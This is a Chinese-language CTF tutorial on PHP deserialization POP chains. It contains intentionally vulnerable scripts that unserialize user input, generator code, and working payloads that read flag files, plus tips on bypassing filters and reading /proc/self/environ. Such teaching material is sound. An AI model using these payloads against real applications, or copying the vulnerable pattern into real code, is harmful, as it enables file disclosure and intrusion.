【CTF】PHP反序列化基础知识与解题步骤

在CTF中，PHP反序列化漏洞是一个常见的考点。PHP反序列化链（也称为对象注入漏洞）利用了PHP序列化与反序列化的特性，通过精心构造的序列化字符串，触发特定的类方法，从而实现恶意代码执行、文件读取或逻辑绕过等攻击目标。

---

一、PHP序列化与反序列化基础

1.1 什么是序列化与反序列化

在PHP中，序列化（serialize()）是将变量（包括对象）转换为可存储或传输的字符串的过程，而反序列化（unserialize()）则是将序列化后的字符串还原为原始变量或对象的过程。序列化的主要目的是方便数据存储（如保存到文件或数据库）或传输（如通过网络传递），而反序列化则是为了将这些数据还原为PHP程序可以操作的变量或对象。

序列化后的字符串包含了变量的类型、值以及（对于对象）所属的类名和属性信息，但不会保存类中的方法。例如，一个简单的PHP对象序列化示例如下：

<?php
class User {public $name = "Alice";public $age = 25;public function sayHello() {echo "Hello, I'm $this->name!";}
}$user = new User();
echo serialize($user);
?>

运行后输出：

O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:25;}

解析这段序列化字符串：

• O:4:"User": 表示对象（Object），类名为User，长度为4。
• 2: 表示对象有2个属性。
• s:4:"name";s:5:"Alice": 表示属性name是一个字符串（string），长度为4，值是Alice。
• s:3:"age";i:25: 表示属性age是一个整数（integer），值为25。

需要注意的是，序列化后的字符串只保存了对象的类名和属性值，方法（如sayHello()）不会被序列化。这意味着反序列化时，PHP会根据类名查找对应的类定义，并重新构造对象，但不会直接调用类中的方法。

1.2 反序列化漏洞的成因

PHP反序列化漏洞的根源在于unserialize()函数对用户输入的处理不当。如果一个程序允许用户控制反序列化的输入字符串，且程序中存在某些“魔术方法”（如__destruct、__wakeup、__toString等），攻击者可以通过构造特定的序列化字符串，触发这些魔术方法，进而执行恶意代码或实现其他攻击目标。

常见的PHP魔术方法包括：

• __construct(): 构造方法，在对象创建时调用。
• __destruct(): 析构方法，在对象销毁时自动调用。
• __wakeup(): 在反序列化时自动调用。
• __toString(): 当对象被当作字符串使用时调用。
• __call(): 当调用不存在的方法时触发。
• __get()、__set(): 当访问或设置不存在的属性时触发。

这些魔术方法的自动调用特性为反序列化链的构造提供了可能性。例如，如果一个类的__destruct方法中包含了危险操作（如文件删除或命令执行），攻击者可以通过构造序列化字符串触发该方法。

1.3 反序列化链的概念

反序列化链（也称为POP链，Property-Oriented Programming）是指通过精心构造的序列化字符串，利用多个类的属性和魔术方法之间的调用关系，构建一个触发链，最终达到攻击目的。简单来说，反序列化链是一个“链条”，通过控制对象的属性和类之间的关系，逐步引导程序执行攻击者想要的逻辑。

例如，假设有以下两个类：

class A {public $obj;public function __destruct() {echo $this->obj;}
}class B {public $file = "flag.php";public function __toString() {return file_get_contents($this->file);}
}

如果攻击者构造一个序列化字符串，使得A对象的obj属性是一个B对象，那么在反序列化时，A的__destruct方法会调用echo $this->obj，触发B的__toString方法，从而读取flag.php的内容。这就是一个简单的反序列化链。

---

二、CTF中PHP反序列化链的解题步骤

在CTF竞赛中，PHP反序列化题目通常会提供源代码，目标是通过构造序列化字符串触发特定的逻辑（例如读取文件、执行命令或绕过验证）。以下是一个典型的解题流程。

2.1 题目背景

假设我们有一个CTF题目，提供了以下PHP源代码（index.php）：

<?php
class Start {public $username;public $next;public function __wakeup() {if ($this->username !== "admin") {echo "Only admin can pass!";exit();}if (isset($this->next)) {$this->next->check();}}
}class Check {public $file = "index.php";public function check() {echo file_get_contents($this->file);}
}if (isset($_GET['data'])) {unserialize($_GET['data']);
} else {highlight_file(__FILE__);
}
?>

题目目标是通过构造data参数的序列化字符串，读取服务器上的flag.php文件内容。

2.2 解题步骤

步骤1：分析题目源码

首先，我们需要仔细阅读题目提供的源代码，分析类之间的关系和可能的利用点：

• Start类：
  • 属性：username和next。
  • 方法：__wakeup，在反序列化时触发。检查username是否为"admin"，如果不是则退出；如果next属性存在，则调用next对象的check方法。
• Check类：
  • 属性：file。
  • 方法：check，读取$file指定的文件内容并输出。
• 入口点：$_GET['data']通过unserialize处理用户输入的序列化字符串。

从代码逻辑来看，我们需要构造一个序列化字符串，使得：

1. Start对象的username属性为"admin"，以通过__wakeup的验证。
2. Start对象的next属性是一个Check对象。
3. Check对象的file属性设置为"flag.php"，以便check方法读取flag.php的内容。

步骤2：复制题目源码，删除类中的方法，只保留属性

根据题目要求，我们需要删除类中的方法，只保留属性。修改后的代码如下：

<?php
class Start {public $username;public $next;
}class Check {public $file;
}
?>

删除方法后，类的结构变得更简单，但反序列化时仍会根据类名和属性构造对象。我们需要利用这些属性构造一个有效的序列化字符串。

步骤3：实例化对象并构造链子

接下来，我们需要实例化对象并构造反序列化链。目标是让Start对象的next属性指向一个Check对象，并在反序列化时触发Check的check方法读取flag.php。

构造代码如下：

<?php
class Start {public $username;public $next;
}class Check {public $file;
}$check = new Check();
$check->file = "flag.php";$start = new Start();
$start->username = "admin";
$start->next = $check;echo serialize($start);
?>

在这段代码中：

• 首先实例化Check对象，将其file属性设置为"flag.php"。
• 然后实例化Start对象，将username设置为"admin"，next设置为Check对象。
• 最后调用serialize($start)生成序列化字符串。

运行后可能得到如下输出（实际输出可能因PHP版本略有不同）：

O:5:"Start":2:{s:8:"username";s:5:"admin";s:4:"next";O:5:"Check":1:{s:4:"file";s:8:"flag.php";}}

步骤4：验证序列化字符串

将生成的序列化字符串传递给index.php?data=，即：

http://example.com/index.php?data=O:5:"Start":2:{s:8:"username";s:5:"admin";s:4:"next";O:5:"Check":1:{s:4:"file";s:8:"flag.php";}}

在实际环境中，反序列化会触发以下逻辑：

1. unserialize将字符串还原为Start对象。
2. Start的__wakeup方法被调用，检查username为"admin"，通过验证。
3. 调用$this->next->check()，即Check对象的check方法。
4. Check的check方法读取flag.php的内容并输出。

如果flag.php中包含flag{example_flag}，我们将看到该内容输出。

步骤5：注意事项与优化

• 属性可见性：在序列化字符串中，属性的名称可能因可见性（public、protected、private）而有所不同。例如，protected属性的名称会带有*\0前缀，private属性会带有类名前缀。构造序列化字符串时需注意正确格式。
• 字符转义：将序列化字符串通过URL传递时，需进行URL编码。例如，%3A表示:，%3B表示;。
• PHP版本差异：不同PHP版本的序列化格式可能略有不同，测试时需确保与目标环境一致。

---

三、进阶：构造复杂反序列化链

在实际CTF题目中，反序列化链可能涉及多个类和更复杂的调用关系。例如，题目可能要求利用__toString、__get等魔术方法，或者需要绕过正则表达式过滤。以下是一个更复杂的例子：

3.1 复杂题目源码

<?php
class Logger {public $logFile;public $next;public function __destruct() {if (isset($this->next)) {echo $this->next;}}
}class FileReader {public $filename;public function __toString() {return file_get_contents($this->filename);}
}if (isset($_POST['data'])) {unserialize($_POST['data']);
} else {highlight_file(__FILE__);
}
?>

目标：读取flag.txt的内容。

3.2 构造过程

1. 分析：Logger的__destruct方法会将next属性作为字符串输出，触发FileReader的__toString方法读取filename指定的文件。
2. 删除方法：

<?php
class Logger {public $logFile;public $next;
}class FileReader {public $filename;
}
?>

3. 构造链：

<?php
class Logger {public $logFile;public $next;
}class FileReader {public $filename;
}$fileReader = new FileReader();
$fileReader->filename = "flag.txt";$logger = new Logger();
$logger->logFile = "log.txt";
$logger->next = $fileReader;echo serialize($logger);
?>

输出：

O:6:"Logger":2:{s:7:"logFile";s:7:"log.txt";s:4:"next";O:10:"FileReader":1:{s:8:"filename";s:8:"flag.txt";}}

4. 提交：将序列化字符串通过POST参数data提交，触发Logger的__destruct，进而调用FileReader的__toString，读取flag.txt。

---

四、常见问题与应对策略

4.1 正则表达式过滤

题目可能对输入的序列化字符串进行正则过滤，例如禁止flag关键字。此时，可以尝试：

• 使用相对路径（如./flag.txt）。
• 使用编码（如URL编码或base64）绕过过滤。
• 利用其他文件（如/proc/self/environ）间接获取信息。

4.2 魔术方法限制

如果目标类没有合适的魔术方法，可以寻找其他类的调用链。例如，利用__call触发不存在的方法，或通过__get访问动态属性。

4.3 类不可用

如果题目未提供类定义，需检查是否可以通过已加载的PHP扩展（如SplFileObject）构造链。

---

五、总结

PHP反序列化链是CTF中一个有趣且富有挑战性的考点。通过理解序列化与反序列化的原理、分析题目源码、构造对象调用链，我们可以灵活利用魔术方法和类之间的关系实现攻击目标。本文从基础知识到具体解题步骤，结合实例详细讲解了PHP反序列化链的构造过程。希望读者通过本文能够掌握PHP反序列化漏洞的基本原理，并在CTF或其他安全研究中灵活应用。